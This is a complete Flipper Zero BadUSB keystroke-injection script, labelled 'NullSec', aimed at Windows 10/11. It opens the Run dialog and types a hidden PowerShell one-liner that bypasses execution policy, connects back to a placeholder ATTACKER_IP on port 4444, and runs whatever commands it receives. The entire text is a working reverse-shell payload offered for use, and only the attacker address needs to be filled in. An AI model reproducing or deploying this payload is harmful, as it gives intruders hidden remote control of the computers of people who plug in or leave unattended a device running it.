REM ========================================
REM NullSec Flipper Zero BadUSB
REM Payload: PowerShell Reverse Shell
REM Target: Windows 10/11
REM ========================================
REM CONFIGURE: Change ATTACKER_IP and PORT
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -nop -ep bypass -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"
ENTER
